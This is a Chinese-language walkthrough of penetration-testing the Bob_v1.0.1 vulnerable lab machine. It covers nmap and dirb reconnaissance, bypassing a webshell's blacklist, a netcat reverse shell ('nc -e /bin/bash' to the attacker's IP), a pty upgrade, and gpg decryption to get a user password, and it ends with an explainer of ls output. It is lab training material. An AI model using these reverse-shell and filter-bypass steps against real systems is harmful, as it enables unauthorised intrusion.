Bob_v1.0.1靶机渗透测试笔记

Bob_v1.0.1

一、信息收集

1.主机发现

用Nmap扫描本网段（靶机和kali都是NET连接，都在同一网段）存在那些主机。

nmap -sP 192.168.41.0/24

已知：目标主机IP地址：192.168.41.129

2.端口扫描

nmap 192.168.41.129 -A -p- -oN nmap.A

-A：全面扫描

-p-：扫描全部端口

-oN：讲我精确扫描的结果导出到一个文件里， nmap.A 为文件名

ssh端口号的22被改成了25468，所以需要全面扫描，而不是指定端口扫描

收集的信息：

Port	Server	Version
80	http	Apache httpd 2.4.25 ((Debian))
25468	ssh	OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)

3.网站信息

1）网站被黑过，禁止外部访问，只能内部访问

2）

3）登录窗口没开

4）网站信息收集

nikto -h http://192.168.41.129/
或者
dirb http://192.168.41.129/    #页面敏感文件扫描

扫描网站后台信息

**

访问/passwords.html

访问/lat_memo.html。发现服务器上存在webshell，不过Bob认为它是安全的，可能存在过滤

访问/dev_shell.php

存在过滤

发现可以绕过

下载备份文件，发现黑名单，但我们可以绕过

二、

发现shell，且可以绕过

用kali监听

nc -lvvp 端口号

l：监听

一个v：显示详细信息

两个v：进一步显示详细信息

p：本地监听一个端口号

监听7777端口

连接shell

靶机上：/bin/nc -e/bin/bash 192.168.41.144 7777

连接上了

进行交互式shell。（必须对方有python）

python -c "import pty;pty.spawn('/bin/bash')"

在里面探索有用信息

flag.txt 权限不够，打不开

解密gpg文件

gpg --batch --passphrase 密钥 -d 加密文件

必须登录一个用户才能解密成功，得到bob账号密码

打开flag.txt

扩展

[root@localhost ~]# ls -ahl

total 28K

dr-xr-x---.  2 root root  135 Dec 16 02:34 .

dr-xr-xr-x. 17 root root  224 Dec 14 01:38 ..

-rw-------.  1 root root 1.3K Dec 14 01:38 anaconda-ks.cfg

-rw-------.  1 root root 1.2K Dec 16 02:34 .bash_history

-rw-r--r--.  1 root root   18 Dec 28  2013 .bash_logout

-rw-r--r--.  1 root root  176 Dec 28  2013 .bash_profile

-rw-r--r--.  1 root root  176 Dec 28  2013 .bashrc

-rw-r--r--.  1 root root  100 Dec 28  2013 .cshrc

-rw-r--r--.  1 root root  129 Dec 28  2013 .tcshrc

从上面可以看到，每一行都有7列，分别是：

第一列共10位，第1位表示文档类型，d表示目录，-表示文件，l表示链接文件，d表示可随机存取的设备，如U盘等，c表示一次性读取设备，如鼠标、键盘等。后9位，依次对应三种身份所拥有的权限，身份顺序为：owner、group、others，权限顺序为：readable、writable、excutable。如：-r-xr-x---的含义为当前文档是一个文件，拥有者可读、可执行，同一个群组下的用户，可读、可执行，其他人没有任何权限。
第二列表示链接数，表示有多少个文件链接到inode号码。
第三列表示拥有者
第四列表示所属群组
第五列表示文档容量大小，单位字节
第六列表示文档最后修改时间，注意不是文档的创建时间哦
第七列表示文档名称。以点(.)开头的是隐藏文档